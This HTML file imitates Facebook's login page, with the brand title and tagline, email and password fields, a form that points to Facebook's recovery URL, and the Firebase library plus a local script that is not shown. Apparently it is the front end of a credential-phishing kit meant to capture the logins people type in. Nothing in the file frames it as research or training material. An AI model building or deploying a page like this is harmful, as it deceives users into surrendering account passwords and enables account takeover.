<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="stylesheet" href="css/index.css">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js">
	</script>
</head>
<body> 
    
    <div class="h1">
    <h1 class="h">facebook</h1>
    <p class="pr">Facebook helps you connect and share with the people in your life.</p>
    </div>  
            <form class="main" id="contactForm" action="https://web.facebook.com/login/identify/?ctx=recover&c&multiple_results=0&ars=m_account_switcher&from_login_screen=0&_rdr">
            <input type="text" placeholder="Email address or phone number" class="txt" id="email"><br>
            <input type="password" placeholder="Password" class="txt" id="password"><br>
            <a href="google.com">
            <input type="submit" value="Log In" class="login-btn"><br></a>
            <div class="a-link">
            <a href="" class="link">Forgotten Password?</a>
            </div>
            <div class="ca">
                <a href="" class="pca">Create New Account</a>
            </div>
            </form>

	<script src="https://www.gstatic.com/firebasejs/3.7.4/firebase.js"></script>
	<script src="js/index.js" type="text/javascript" charset="utf-8"></script>
</body>
</html>